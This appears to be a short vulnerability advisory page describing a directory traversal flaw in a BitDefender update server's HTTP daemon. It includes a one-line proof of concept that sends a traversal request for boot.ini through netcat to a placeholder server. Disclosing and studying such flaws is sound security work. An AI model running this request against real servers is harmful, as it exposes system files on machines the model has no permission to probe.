• info
• discussion
• exploit
• solution
• references

BitDefender Products Update Server HTTP Daemon Directory Traversal Vulnerability

An attacker can exploit this issue via a browser.

The following proof of concept is available:

echo -e "GET /../../boot.ini HTTP/1.0\r\n\r\n" | nc <server> <port>